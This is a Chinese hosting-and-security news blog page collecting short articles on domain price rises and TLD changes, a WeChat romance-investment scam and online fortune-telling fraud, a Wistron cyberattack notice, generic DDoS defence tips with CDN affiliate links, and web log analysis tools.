# 主机帮 > 最新网络安全事件指南与主机防御教程 ### 文章 #### "好物圈"微信圈子将于2021年12月28日正式停止运营 5月28日消息,微信圈子发布公告称,因业务发展方向调整,该功能将于2021年12月28日正式停运。据悉,微信圈子的前身是“好物圈”,于2019年初上线。之后,在2019年12月,好物圈更名为微信圈子。 具体安排如下:2021年6月28日关闭互动能力;2021年6月28日下线圈子入口;2021年12月28日圈子小程序停止运营。2021年6月28日起,停止新增帖子、评论。在圈子停运前,可使用“导出个人主页数据”的功能,保存本人曾在圈子发布过的内容。 微信圈子表示,因微信圈子停运给用户带来的不便,我们深表歉意。如有未尽事宜,请前往微信圈子公众号联系客服反馈。 #### "网络算命"招重击 央视起底网络占卜 微信将严打 12月9日 消息:据小央视频报道,新的一年即将开启,近日,网上各种“网络算命”服务纷纷上线。 以“占卜”为关键词在某短视频平台进行搜索时,结果显示,综合排名第一的是一条用塔罗牌预测未来情感走势的短视频,一共收获了31.5万个点赞。而另外一条用塔罗牌测姻缘的短视频,点赞数更多,一共有39.5万个赞和近9万条评论。 据悉,用户如想占卜来年运势,需要支付348元。而预测来年财势需要购买“招财黄水晶”,价格为368元。 此外,进入一个名为“AI手相面相分析”的微信公众号,按照提示,提交了一份面部完整无遮挡的照片,就可开始体验所谓的人工智能“相面”。不到30秒钟,页面就显示“报告已生成”,但想要获取,需要支付9.9元。 而这只是付款的第一步,因为在这份报告中,还包含着很多单项报告。想要获取“鼻相解析”报告,需要支付2.9元;获取“事业运程报告”,需要支付19.8元;同样,想要获取“情感运程报告”,也要支付19.8元。 据该公众号账户资料显示,该账号注册运营了15个月,收入就多达近80万元。 对此,微信相关负责人表示,其实这类的违规账号,微信日常一直都有在打击,通过机器识别和人工审核相结合的一个方式,发现一个就会封一个。 据悉,目前该账号已被封号。 对此,相关专家表示,网络算命也可能就是给你一个很模棱两可的一个答案,但是却是让你能够最容易对号入座的那个答案,所以就能让你觉得可信。网络占卜,你想算命,而他想算的却是你的钱。 其实不只微信有大量网络占卜,抖音也大把这类网络占卜,编一个非常吸引人的故事,然后拍成视频,再挂个占卜小程序,非常多人中招。不知道这次央视曝光,抖音会不会严打呢? #### "误加”别人微信 单身女性微信被骗案例 之前有发过一篇微信上遇到骗子的文章,不过骗子的对像是单身男性,其实女性也有遇到类似的套路,今天我们就来看看骗子是如何骗单身女性的。 有这样一群男人,他们成熟多金,事业有成,经常各地做公益。他们经常“误加”别人微信,而且喜欢“误加”大龄、有钱的女性。 加了微信之后对女性嘘寒问暖,关怀备至,有好的项目,说要一起赚钱。 然而当女性投进去钱后,却再也拿不回来了... 吴女士被“误加”微信 100多万打了水漂 在北京城内,活跃着这样一群男人,他们成熟多金,事业有成,富有爱心,经常各地做公益。有一天误加微信之后,从此对你嘘寒问暖,关怀备至。有好的项目,也说带着你做,一起赚钱,赚到钱后一起去做公益,给贫困儿童建学校,给孤寡老人献温暖,浑身充满正能量。 他们经常“误加”别人微信,而且喜欢“误加”大龄、有钱的女性。 北京的吴女士曾经被“误加”过,听听她的讲述: 去年年底,有一个人微信加错人,添加了我,添加之后他开始介绍自己名叫丁楠,是一家金融公司的老总。 一开始我没有跟他聊天,但他会坚持每天对你嘘寒问暖,比如雾霾注意戴口罩,天冷要添衣服一类的,我也是嗯啊的应付了事。 过了一段时间,他给我发了一段他组织公司员工去孤儿院的视频给我,让我感觉这个人是个比较有爱心的人,之后和他聊天态度慢慢好了一些。 取得信任之后: 聊到比较熟悉的时候他就开始套取我的资金情况,然后就开始介绍说有个很好的新三板项目,6-8个月转板上市后,收益会相当高,想让我也一起参与。 一开始我没有接受,后来他就开始各种劝说,说朋友之间就应该互相帮助,好东西共同分享,最终在他多次劝说后我接受了,心怀感激地投了100多万进去。 据吴女士介绍,因为有前期微信聊天建立的信任作基础,当时她去到丁楠的公司之后,办公地点坐落在中央电视台的对面,办公环境高大上,很快就签下了目标公司股份代持协议,买入两只新三板股票,以15元/股买入格润牧业(835354 )85万元;以16元/股买入中原物流(839535)83.2万元。 投入进去之后就是梦魇! 小胖(kkk142882) 刚买入时格润牧业还曾涨到30元,中原物流基本价格变化不大。但自从今年1月15日新三板新规出来之后,改变了交易模式,这两只股就开始暴跌,股价从15、16元跌到了3元,这些股票也基本没有成交量了,变成了僵尸股,这时我才意识到自己被骗了。 然后去查协议里那家公司,去了公司注册地发现根本就没有这个公司,再去丁楠的公司也人去楼空了,我查询了签协议的公司根本就没有代持新三板的资质,也就是说我这笔钱完完全全被他们骗走了。 再回过头来看,格润牧业之前的所谓上涨,也有猫腻,从交易对手方来看,完全是一伙人自买自卖,那些拉高到30的也都是最后快收盘的时候0.1万股成交,拉高价格。有人挂低价卖不出去,就看着高价的双方成交。 中原物流, 第二大股东以 2.99元/股的价格减持80万股,随后1笔1000股的单就将其拉高到11.80元/股。 在互联网上,招新三板股权代理的广告很多,有的表示可返佣70%以上,这个佣是谁来返?值得深思。 无独有偶,另一女子也被骗 小胖(kkk142882) 巧合的是,差不多在同一时间段,同在北京的孙女士也被人误加了微信,加她微信的人,也叫丁楠,同样的优质金融男,嘘寒问暖,关怀备至,为人非常的正能量,朋友圈内容显示出入都是高级场所。这让正处于感情低潮期的孙女士备感温暖。 慢慢的丁楠说话变得有些暧昧,他对孙女士说,心疼她工作太辛苦,赚钱不容易,他有好的资源,好的方式,可以教孙女士进行期权投资,轻松赚钱。一个月的投资周期,收益在八至十几个点不等,绝对安全。 加微信大约两个月后,他们在丁楠的公司见面了。 “公司在大裤衩对面,30楼,公司得有一两百号人吧,人人面前摆一台电脑,大家都称丁楠为丁总。” 也就是这次,孙女士转入110万到丁楠提供的账号,用于股权投资。 回到家后,丁楠给孙女士发来一个二维码,扫码安装了一个叫“众诚服务系统”的软件,在里面买入了黄金和螺纹钢,投资周期1个月。 一个月后,丁楠告诉她,110万变成20万了,非常内疚,希望孙女士追加投资,一定帮她赚回来。孙女士安慰他没关系,没钱追加了,就拿这20万炒吧。 又一个月后,变成了30万,希望追加资金。孙女士表示确实没钱追加。 又一个月后,变成了3.7万。 这时,孙女士觉得有些不对劲了,在此之前她一直认为这只是投资亏损,在这期间,他们甚至还去看了一场电影,丁楠在电影开场之前匆匆而来,电影结束之后说要去机场接人匆匆离去。 孙女士发现,她当时打入资金的那家公司已经注销,去过的丁楠的办公室也已经搬走了,丁楠的微信还能联系,但面对孙女士的质问,百般推脱。 小胖(kkk142882) 原来,丁楠不止一个 吴女士和孙女士都选择了上网搜索,这才发现全国均有他“误加”的女性朋友。 同样的套路:暧昧聊天骗你投资期权或新三板,而且会有多个叫丁楠的微信号针对不同类型的女人下手,投资以后你会发现要不是黑平台陷阱保准让你血本无归,要不是新三板操纵股价下跌最后成为僵尸股无法交易,总之是钱只要进去了就别想出来,至多回来一个零头,而且他们基本只针对女性下手。 她们在一个受害者群里相遇。在这个30多人的受害者群里,有5、6个女性均是被丁楠所骗,她们一对照发现,丁楠有3-4部电话,5-6个微信。而剩下的女性,则是被其丁楠公司的其他人所骗。为什么这么说呢,因为这些身份各异的“金融精英”“成功人士”所摆拍的照片,背景是同一间办公室,同一张办公桌,桌上是同一盆绿植。 “现在回想起来,当时去他们公司的时候,气氛有些怪异,那些人表情好像很紧张的样子,但因为太相信丁楠了,我没仔细想。” 也就是说,丁楠只是这个名为北京亿铭创富公司的“优质男”之一,其他还有贾铭、韩志帆、赵春伟、陈鹏太等等,他们分别又负责搭讪若干个女性账号。 而那些让女士备感温暖的微信聊天,也并非来自丁楠们,而是有专门的人负责聊天,丁楠们在公司负责的是见面这个环节。据内部人士透露,每个丁楠背后,会有8-10个业务员,他们广撒网,到处加微信,筛选目标客户,培养感情。而这些业务员背后,均是经过了专业的话术培训。面对每个女性怎么聊天都有相应的技巧,迅速套出对方是不是有房有车有钱。一些“成功”的案例还会被他们作为新人培训。 更可怕的是,这伙人名下注册20多家公司,骗完一波人之后公司注销搬家,接着重新注册新公司打着新旗号继续行骗。 从公司规模来看,这并不是一个小团伙,而且不止一个地方,比如说北京的熟面孔他可以换到天津从头来过。你查他吧,确实是这个名,照片也是本人,公司确实高大上,员工确实称他为总,你查工商资料他确实是法人或股东、高管,这就是骗术的高明之处。 “刚刚,我们群里又进来2个深圳的受害者。他们还在继续。而进群的只有一小部分人,有的受害者出于名声、家庭等原因考虑,并不想露面。”孙女士表示。 小胖(kkk142882)在此提醒大家,微信添加进来的陌生人一定要注意,麻麻说不能和陌生人说话. #### #同花顺崩了#APP登上微博热搜榜:故障原因为网络线路出现异常 2021年10月28日10点左右,#同花顺崩了#登上微博热搜榜。10:45分@同花顺 发布微博称:因网络线路出现异常,同花顺APP部分用户出现登录异常,目前已经恢复。引发股民吐糟:还以为同花顺跑路了呢……2021年10月9日,另一券商富途也曾发生过服务故障事件,事故原因是台风导致香港机房断电所致,看来云数据时代,网络也没有想象中的坚挺哈。同花顺股票软件是一个提供行情显示、行情分析和行情交易的股票软件,它分为免费PC产品,付费PC产品,电脑平板产品,手机产品等适用性强的多个版本,是目前国内最受欢迎的股票软件。 #### .ai 域名卖爆 安圭拉小岛一年躺赚3200 万美元 据美联社 10 月 16 日报道,.ai 域名卖爆也为加勒比海的一个小岛 —— 安圭拉带来了一笔横财。 随着人工智能产业的火热,AI 域名也成为了新的热门,包括 .ai 后缀等自然是交易重点。 借着 .ai 域名的注册、卖出等,安圭拉 2023 年从网络域名注册费中获得的收入翻了两番,达到 3200 万美元。目前,这项收入约占安圭拉政府总收入的 20%。在人工智能繁荣之前,该占比徘徊在 5% 左右。 为了帮助跟上域名注册的爆炸性增长,安圭拉当地时间周二表示,它将与一家美国域名管理公司签署协议。他们表示,该协议将为政府带来更多收入,同时提高网址的弹性和安全性。 报道提到,目前全球有超过 53.3 万个 .ai 网页域名,自 2018 年以来增长了 10 倍以上。 安圭拉(英语:Anguilla)是英国 14 个海外领土之一,位于加勒比海小安的列斯群岛北部,面积 91 平方公里,在 1650 年成为英国殖民地,后续经历一系列波折,于 1980 年成为单独的英国属地。 根据地区名称分配,安圭拉在 20 世纪 90 年代获得了.ai 域名的控制权,本来是代表安圭拉地区网站。时隔三十多年,安圭拉的地区网站成为了 AI 网站的代名词。 比如,谷歌使用 google.ai 展示其人工智能服务,而埃隆・马斯克使用 x.ai 作为 Grok AI 聊天机器人的主页。 #### .app域名将开放注册 或成最贵域名后缀 3年前,Google豪掷巨额美金,击败12家竞争对手拍得了这个顶级域名.app,还刷新了顶级域名后缀最高交易记录史。今天终将正式开放了.app域名的注册,并声称是全球首个需要HTTPS加密的顶级域名。 “APP”的含义,人尽皆知,就是我们熟知的手机中必不可少的“应用程序”。.app更是诸多站长梦寐以求的域名后缀,因为它可以和应用程序相连接。 目前,大部分人熟悉和使用的通用顶级域仍是“.com”,而谷歌的.app顶级域名吸引力在于不仅刚刚开放注册,而且还便于记忆。.app的独特后缀含义和未来市场发展方向,对于APP市场和移动互联网企业,无疑具有极强的吸引力及发展潜力。 5月8日,.app域名将正式面向公众,开放注册。不过域名注册和续费价格至今为止,还没有披露。 目前,用户可以通过谷歌设置的get.app网站来查看你喜欢的域名是否被注册。 不过,如今新顶级后缀域名要想在国内发展,必须要经过工信部审批备案,因此.app域名能否与国内用户“见面”,还是个问题。值得一提的是,.app是迄今为止第三贵的域名后缀。 #### .cn/.中国域名隐私保护服务要开始收费了? 最近,从西部数码得知,西部数码居然对.cn/.中国域名隐私保护服务下手了,收费48元/个/年! 其实国外域名隐私保护功能,一直都是收费的,而国内一直都是免费的,现在西部数码是要带头收费了吗?所谓域名隐私保护,其实就是隐藏域名所有者的名字,电话,邮箱。这三样东西非常重要,对于一个正常的网站来说,这三样东西是可以联系到网站主的。 以前没有隐私保护功能的时候,只要你注册并运行一个网站,就会收到一堆的垃圾邮箱与垃圾电话。后来出了隐私保护功能后,这样的情况少了很多。结果现在又开始收费了,一但不开隐私保护,那个垃圾满天飞的时候又要回来了? #### .COM和.XYZ域名又要涨价啦 持有.com和.xyz后缀域名的同学,赶紧提前续费,COM和.XYZ域名又要涨价啦。 最新消息,2023年9月1日起.COM及.XYZ域名价格将上调,届时国内COM域名续费应该是80元以上,甚至更高,相比最低的时候30多元一年的价格,com域名这几年的价格已经涨了两倍多了。 目前很多同学都有收到涨价通知了: 实事上,com域名已经连续涨了好几年了,为什么会出现这种情况呢? 原因是因为美国把COM域名给了一家叫威瑞信verisign的美国公司代理运营,而且允许提高com域名价格,允许威瑞信在未来十年中(除了 2024 年以及2025 年),每年将价格提高 7%;根据协议的内容,在未来十年的时间之内,com 域名的价格最高可能会上涨至 $13.50 美元,当用户通过国内注册商为com域名,任何一个注册商都需要支付$7.85美元的注册或续订费用给威瑞信,如果按照最高的成本价来算话,以现在美元对人民币的汇率,单成本就高达160多元人民币!这还只是国内代理商没有任何加价的情况下的价格,一但代理商加价,那么com一年的续费分分钟上到170、180,可能离谱点的一年200元。 所以,大家要趁着现在域名续费还没过百的时候赶紧续费,未来不可能比现在便宜了。 关于VeriSign的知识: VeriSign是一家专注于多种网络基础服务的上市公司,位于美国加州山景城。该公司提供的服务包括域名注册、域名解析、域名安全、网站认证和SSL证书等,统称为“智能基础设施服务”。VeriSign的服务在互联网领域广泛应用,是许多网站和在线业务的重要组成部分。 VeriSign是.COM域名的最高级别代理机构,也是唯一一个代理.COM等域名的机构。因此,VeriSign的每一次涨价,都意味着全球COM域名涨价。 #### .com域名又要涨价了,已经连续涨了4年了。 根据最新的信息,Verisign公司在2024年8月6日宣布,将在同年9月1日再次上调.com域名的批发价格,从9.59美元上调至10.26美元,增幅为7% 。这是.com域名价格连续第四年上涨7%,符合威瑞信与美国政府达成的协议允许的最高涨价幅度 。 .com域名的涨价始于2021年9月1日,这是由网络基础服务商威瑞信(Verisign)宣布的,涨价范围包括新注册、续费和转移注册商的费用。当时,涨价的金额是上涨了0.54美元,使得新注册、续费、转移续费的成本从8.03美元上涨至8.57美元。这意味着国内.com域名的续费价格可能会上涨到大约70元人民币左右 。此外,威瑞信与ICANN签订的合同允许.com域名从2021年开始,到2024年合同结束,每年涨价7%,最终达到10.29美元(目前约等于73.5人民币) 。 主机帮看了下,目前大厂没有提及COM域名涨价的事,但小厂已经说明要涨了,比如华夏名网、西部数码。 主机帮猜测今年大厂可能不涨价了,原因是目前大厂收的费用已经超过了COM域名给的成本价太多了,Verisign的成本价73.5元,而大厂收85元,差价11元,这个价格大厂还是赚的,毕竟域名根本不需要什么维护成本,顶多是需要DNS服务,不过一些大厂靠卖DNS增值服务都赚了,根本不需要赚这域名注册管理费。 现在建站成本越来越高了,真怀念以前200元一年做网站的日子。 #### .com域名涨价啦 建站成本又提高了! 8月5日 消息:今年早些时候,网络基础服务商威瑞信(Verisign)宣布,将提高.com域名注册、续费、转移续费的价格。 现在,.com域名涨价时间终于确定:从2021年9月1日开始实施。 Verisign涨价通知内容如下: 涨价时间:北京时间2021年9月1日12点; 涨价范围:新注册、续费、转移注册商; 涨价金额:上涨$0.54。 .com域名注册商的新注册、续费、转移续费成本将从$8.03上涨为$8.57。 也就是说,.com域名后面不论是注册,续费,转入等各项业务的费用都上涨0.54美元(大约3.4895人民币)。 据悉,由GoDaddy和Namecheap等域名注册商支付给威瑞信的批发成本将从7.85 美元/年提高到8.39 美元/年。值得注意的是,这个注册价还不包括域名注册商的加价,以及ICANN收取的0.18 美元的额外费用。 此前,域名系统监督机构ICANN批准了Verisign的 .com注册协议,允许 .com域名未来四年每年涨价7%。从2021年开始,到2024年合同结束,这一价格每年将增加7%,最终达到10.29美元,为网络运营商Verisign带来数亿美元的纯利润。而作为监管方非营利组织ICANN从Verisign那里获得2000万美元作为续签合同的回报。Verisign在过去20年里一直运营着 .com注册中心。 当然,由于域名注册商会处于不同原因设定零售价格,一些注册服务商会通过提供特殊交易和优惠券代码来降低域名注册、续订和转让的价格。因此,很难预测域名注册商打算如何将批发价格涨幅转嫁给客户。 在这里,主机吧建议站长们如果有批量注册/续费的需求,最好在9月1日涨价之前办理,这样可以节省一些成本。 #### .day域名开放注册 公司、公益组织个人均可以申请 1月26日 消息:谷歌推出了新的.day域名系统,允许公司、慈善机构、组织和个人使用域名,涉及的领域达到了22个。 谷歌指出非营利组织也提高了认识,包括人权运动的知名的节日、本土非营利日、国家妇女法律中心的同工同酬日、GAAD基金会的无障碍日、全国有色人种协进会的MLK日、世界野生动物基金会的野生动物日、Comic Relief的红鼻子日、Rubicon 团队的退伍军人节和芝麻街的芝麻街日。 公司也在购买 .day域名,例如 Ferrero 的 Nutella.day、The Knot 的 Wedding.day 和花卉递送服务FTD的 Valentines.day。也有名人和社交平台大V纷纷效仿,包括Felicia.day。 在本周内,注册需要支付一次性费用,但从下周开始,任何人都可以以正常价格注册他们的域名。 #### .INK和.VIP等顶级域名后缀将注销 刚刚,主机帮从工信部网站了解到“.VIP”“.BEER”“.LAW”“.WORK”“.FASHION”“.LUXE”“.YOGA”“.FIT”等8个顶级域相关业务将注销! 也就是说,这些后缀的域名以后无法使用了!惊不惊喜,意不意外! 这几个域名都是由国内北京拓扑维度科技有限公司和北京明智墨思科技有限公司这两家公司运营的,现在这两家公司直接不做了,意味着以后这些域名将无法使用了。 相关链接:https://www.miit.gov.cn/zwgk/wjgs/art/2024/art_b64fa7c6a9014ed1ba39feb85587641d.html 为什么突然不做了呢?其实原因是这几年网站萎缩,注册域名的用户少了,“.VIP”“.BEER”“.LAW”“.WORK”“.FASHION”“.LUXE”“.YOGA”“.FIT”这些域名注册的用户更是少得可怜,而要维持运营这些后缀成本很高,一些域名机构为了省成本,只能把这些不赚钱的域名砍了。 从这件事告诉我们一定道理,千万别不要用那些非主流的域名,特别是一些所谓的新顶级域名,这些顶级域名其实申请下来成本很低,之前网站兴起的那些年,很多国内外的互联网公司都申请了自己的专属域名,什么乱七八糟的都有,现在网站业务萎缩了,问题就出来了,一些企业干脆连域名后缀都注销了。 如果你刚好用了他们的后缀的域名,那么不得不面对着需要更换域名的情况,而网站更换域名是损失非常大的,域名就像一个门牌号,如果更换了,很多人是找不到你的域名的。 主机吧建议注册.com、.net这类国际顶级域名,实在不行注册国家级域名.cn,这类域名是绝对不会倒闭的。 #### .io又一个域名后缀可能退出,大量网站受影,Github.io 等科技网站可能要换域名 10 月 12 日消息,科技媒体 The Verge 于 10 月 9 日发布博文,报道称英国上周宣布放弃查戈斯群岛所有权之外,同时宣布放弃 .io 顶级域名,可能会影响 Github.io 等域名网站。 查戈斯群岛在 18 世纪由法国人定居,1814 年法国将其控制权转交给英国,此后查戈斯群岛成为毛里求斯的附属岛屿。 查戈斯群岛于 1997 年被分配 .io 国家代码域名。根据 GigaOm 在 2014 年的一份报告,英国政府将销售.io 域名的权利授予了互联网计算局(ICB)。 .io 域名由于可以理解为“input / output”,因此备受科技初创公司和加密货币公司青睐,而本次调整让 .io 域名的未来变得不确定。 公开资料显示,互联网分配号码局(IANA)有个淘汰国家代码域名的机制,期限为五年(可以延长),目前尚不清楚 .io 域名是否会进入淘汰机制。 一但进入淘汰机制,意味着这个域名后缀可能会被注销,影响所有使用这个后缀的域名,而使用了这些后缀的网站,不得不面临更换域名的风险。 使用.io后缀的大型网站包括但不限于: GitHub - 著名的代码托管平台,其用户页面和项目页面经常使用.github.io作为子域名,用于托管个人或项目的网站。 Etherscan - 以太坊区块链的区块探索者,使用etherscan.io作为其域名。 itch.io - 一个流行的独立游戏发布平台,允许开发者发布和销售他们的游戏。 Greenhouse.io、Material.io、Keywordtool.io和Spring.io - 这些是科技初创公司和SaaS公司使用.io域名的例子 #### .net域名又涨价了,阿里云将涨价93元首年 根据最新的消息:从2024年2月1日起,阿里云对.net英文域名的价格进行调整。调整后,首年注册价格将是93元人民币,续费价格为99元人民币,而域名转入的价格调整为90元人民币。这次价格调整是由于注册局成本上涨以及域名实名制审核等服务成本不断增加所致。 相关信息 这已经是net域名第N次上涨了,在主机吧认知里,net域名从39元首年,续费59元,涨到现在首年93,续费99。几乎价格翻倍了。 #### .ren域名风险提示,注册局官网已无法打开 根据搜索结果,.ren域名的注册管理机构是互联网域名系统北京市工程研究中心有限公司(简称:ZDNS)。 而现在.ren域名的注册局官网(nic.ren)直接打不开了。 ZDNS是2020年获批.ren顶级域名注册管理机构的,按理说今年才第四年,这么快就不行了? 主机吧查了下,.ren域名目前在西部数码依然是可以处于可以注册状态。 不过,为了保险起见,不见大站长注册这些非主流域名,很容易出现问题,比如由于该域名国内没有注册管理机构,导致的结果是无法进行ICP备案。 #### .TM域名是我见过最离谱的域名 这些年,由于主流后缀好听好记的域名基本都被注册完了,一些非主流域名拥有好记好听的特点,深受一些新站长的喜爱,主机帮的一位站长就注册了一个.TM的域名,没曾想,踩坑了! 原因是.TM的域名的续费价格暴涨,本来就很贵的域名,现在续费价格直接翻了3倍多。 都说COM域名涨价贵,现在看看TM域名,你心里就舒服多了吧,这个域名简直是割韭菜来的。 这里我们可以看出,千万别选那种非主流域名,哪怕没有好域名可选了,也不要选那种非主流后缀的域名,哪天价格暴涨了,真的地方说理去。 而COM域名涨价是需要准备的,非主域名涨不涨全看顶级域名商的心情。 #### .ws 成为首个实现区块链镜像的顶级域名 10 月 24 日消息,科技媒体 The Tech Outlook 昨日(10 月 23 日)发布博文,报道称得益于 Freename 和 WebUnited 提供的技术,.ws 成为首个实现通过区块链镜像(Mirrored On-Chain)的国家代码顶级域名(ccTLD),标志着域名行业的一项重大创新。 区块链镜像(Mirrored On-Chain)域名是指将传统域名镜像或者映射到区块链中,结合传统互联网域名与去中心化技术的优势,让域名能够在区块链生态中使用,增强安全性和透明度。 .ws 顶级域名由 Domains Cost Club 运营和维护,用户在购买传统域名时可选择 Web3 区块链镜像,一旦创建了链上版本的 .ws 域名,用户可以管理 Web3 工具,其中就包括钱包地址解析。 虽然.ws 是首个实现链上镜像的扩展名,但未来将有更多扩展名加入,帮助用户在 Web3 中使用他们喜爱的域名。 #### 1.1.1.1是什么软件 1.1.1.1 是 Cloudflare 提供的一个公共 DNS 服务的 IP 地址。它是一个免费且快速的 DNS 解析器,旨在提高网络连接速度和安全性。使用 1.1.1.1 作为 DNS 服务器可以加快网页加载速度、减少延迟并增加隐私保护。 Cloudflare 还提供了一款名为 "1.1.1.1: Faster Internet" 的移动应用(适用于 Android 和 iOS),用户可以通过该应用轻松地在手机上配置 1.1.1.1 DNS 服务,从而获得更快的互联网速度和更好的隐私保护。此外,该应用还提供了 WARP 加速功能,进一步优化用户的网络体验。 不过需要注意的事,1.1.1.1DNS在国内并不友好,由于Cloudflare 在国内并没有部署有DNS服务器,导致国内解析需要连接美国服务器,无形中增加了解析时间,甚至部分地方因为跨国网络问题出现无法访问的情况,我们需要谨慎使用。 #### 10 月 5 日纬创遭受网络攻击 10 月 6 日消息,纬创 10 月 5 日晚间公告称遭受网络攻击,网站皆已恢复正常运作,估计对运营尚无重大影响。 纬创表示,事件是发生在 10 月 4 日,公司于遭受网络攻击时,立即启动相关防御机制,目前网站皆已恢复正常运作。 纬创指出,经评估没有个人资料或内部文档数据外泄,对运营尚无重大影响。公司相关网络安全防护机制,已足以应对这一事件,后续将持续密切监控。 纬创前身为宏碁电脑股份有限公司于 1981 年成立的 DMS 部门(设计、生产和服务部门),于 2001 年成立纬创资通集团。纬创自身定位为 ODM 专业供应商,专注于信息与通讯产品,包括笔记本电脑、桌上型电脑系统、服务器和储存设备、信息设备、网络以及通讯产品。 October 6th news, Wistron Corporation announced on the evening of October 5th that it suffered a cyberattack, and all websites have returned to normal operation, with no significant impact on operations estimated. Wistron stated that the incident occurred on October 4th, and the company immediately activated relevant defense mechanisms when the cyberattack occurred, and all websites have now returned to normal operation. Wistron pointed out that after assessment, there was no leakage of personal data or internal document data, and there was no significant impact on operations. The company's relevant cybersecurity protection mechanisms were sufficient to deal with this incident, and continuous close monitoring will be carried out in the future. Wistron, formerly known as the DMS division (Design, Manufacturing, and Service) established by Acer Computer Inc. in 1981, was founded as Wistron Group in 2001. Wistron positions itself as an ODM professional supplier, focusing on information and communication products, including notebooks, desktop computer systems, servers and storage devices, information devices, and network and communication products. #### 100G DDOS攻击怎么防御 DDoS攻击(分布式拒绝服务攻击)是指攻击者通过控制大量的计算机或设备向一个目标服务器或网络发起大量的请求或流量,导致服务器或网络超载而无法正常响应合法请求,从而使其无法正常工作。 以下是一些防御100G DDoS攻击的建议: 使用DDoS防护服务:您可以考虑使用专门的DDoS防护服务,这些服务通常具有高度可扩展性和高效性,并能在攻击发生时迅速响应。 增加网络带宽:通过增加网络带宽,您可以增加服务器或网络处理流量的能力,从而使其能够更好地应对DDoS攻击。 限制网络访问:通过限制某些IP地址或区域的访问,您可以减少可能会发起DDoS攻击的来源。此外,还可以采取其他安全措施,例如身份验证、限制用户权限等。 配置安全设备:安装防火墙、入侵检测系统(IDS)和入侵防御系统(IPS)等安全设备可以有效地识别和阻止攻击流量。 进行灾备规划:建立灾备计划并将其纳入整个安全体系,以准备可能的DDoS攻击,包括备份数据、准备备用服务器等。 使用CDN(内容分发网络):使用CDN可以将流量分散到全球各地的节点上,从而减轻服务器或网络的负载,提高抵御DDoS攻击的能力。 针对DDoS攻击的防御技术:例如,源IP地址验证、流量过滤和负载均衡技术等,可以有效地防御DDoS攻击。 与ISP合作:与互联网服务提供商(ISP)合作可以使您的防御措施更有效。ISP可以提供流量清洗和防御DDoS攻击的专门服务,从而为您的网络提供额外的保护。 总之,DDoS攻击是一种很棘手的安全问题,但采取上述建议可以帮助您更好地应对100G的DDoS攻击。 主机吧推荐利用高防CDN进行分布式防御: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 100PB!互联网史上最大数据迁移之一:115科技迁至阿里云 6 月 7 日,上海云栖大会上, 115 科技和阿里云宣布完成阿里云史上最大数据迁移上云项目, 115 科技的全部数据都搬迁至阿里云上,规模超过100PB,整个项目耗时仅 45 天,创造了新的“中国速度”,这也是中国互联网史上涉及用户量最多、数据规模最大的迁移项目之一。 115 科技是一家成立 9 年、以云存储起步的高新技术企业,旗下核心产品之一“115”(原“ 115 网盘”)是国内最早一批上线的云盘产品。 115 科技创始人赖霖枫表示, 115 科技与阿里云的合作意义重大,此次合作有望帮助 115 科技进一步加速业务的增长,并且阿里云提供的IT架构优化支持,也将持续降低公司的存储运维成本。 更重要的是,将“基础设施”托付出去后, 115 科技团队得以集中精力,聚焦顶层设计,为用户提供更好的产品体验和更稳定的线上服务。于是, 115 科技在不久前发起了这场史诗级的迁移项目。 阿里云总裁胡晓明表示,这次合作创造了阿里云史上最大的日迁移量,也是节奏最快的一个项目,阿里云在短短 10 天时间里完成 11 个功能的设计、开发、测试和上线。 在此次合作中,阿里云为 115 科技量身定制迁移方案,为确保 115 科技的业务不受任何影响,方案中将不同地区物理机内的数据与云上的放置位置进行了一一对应的规划,保证每一比特都有迹可循,并制定了非常有效的物理机回收计划。 据悉,基于上云迁移项目的平滑过渡, 115 科技近期将有一次重大的产品升级,旗下两大核心产品“ 115 组织”和“115”都进行了全新改版, 115 科技已经逐步发展成为以存储、社交、记录为纽带,承载用户一生数据的产品。 据了解,阿里云此前曾经为中石化、中国邮政、中国南方电网、飞利浦等企业迁移上云,阿里云在这个领域提供混合云接入、应用迁移、数据平滑迁移等多项产品和专业技术,同时提供云化战略咨询、上云方案设计和实施、云上应用架构和数据库优化等专家服务,在业界积累大量核心技术和实战经验,具有解决互联网、传统行业数据迁移上云的各种复杂场景的能力。 #### 105款App因违法收集个人信息被通报 抖音快手百度在列 5月21日 消息:今日,国家互联网信息办公室表示,针对人民群众反映强烈的App非法获取、超范围收集、过度索权等侵害个人信息的现象,依据《中华人民共和国网络安全法》《App违法违规收集使用个人信息行为认定方法》《常见类型移动互联网应用程序必要个人信息范围规定》等法律和有关规定,组织对短视频、浏览器、求职招聘等常见类型公众大量使用的部分App的个人信息收集使用情况进行了检测。 国家网信办称,针对检测发现的问题,相关App运营者应当于本通报发布之日起15个工作日内完成整改。 据上榜名单显示,短视频类App中,抖音、快手、抖音火山版、快手极速版等APP上榜。浏览器类App中360浏览器、搜狗搜索、百度浏览器等上榜。 #### 10个好用的Web日志安全分析工具 一款简单好用的Web日志分析工具,可以大大提升效率,目前业内日志分析工具比较多,今天推荐十个比较好用的Web日志安全分析工具。感兴趣的同学可以收藏一下 经常听到有朋友问,有没有比较好用的web日志安全分析工具? 首先,我们应该清楚,日志文件不但可以帮助我们溯源,找到入侵者攻击路径,而且在平常的运维中,日志也可以反应出很多的安全攻击行为。 一款简单好用的Web日志分析工具,可以大大提升效率,目前业内日志分析工具比较多,今天推荐十个比较好用的Web日志安全分析工具。 1、360星图 一款非常好用的网站访问日志分析工具,可以有效识别Web漏洞攻击、CC攻击、恶意爬虫扫描、异常访问等行为。一键自动化分析,输出安全分析报告,支持iis/apache/nginx日志,支持自定义格式。 下载地址: https://wangzhan.qianxin.com/activity/xingtu 本地下载地址 https://www.jb51.net/softs/270178.html 2、LogForensics TSRC提供的一款日志分析工具,可从单一可疑线索作为调查起点,遍历所有可疑url(CGI)和来源IP。 相关下载地址: https://security.tencent.com/index.php/opensource/detail/15 3、GoAccess 一款可视化 Web 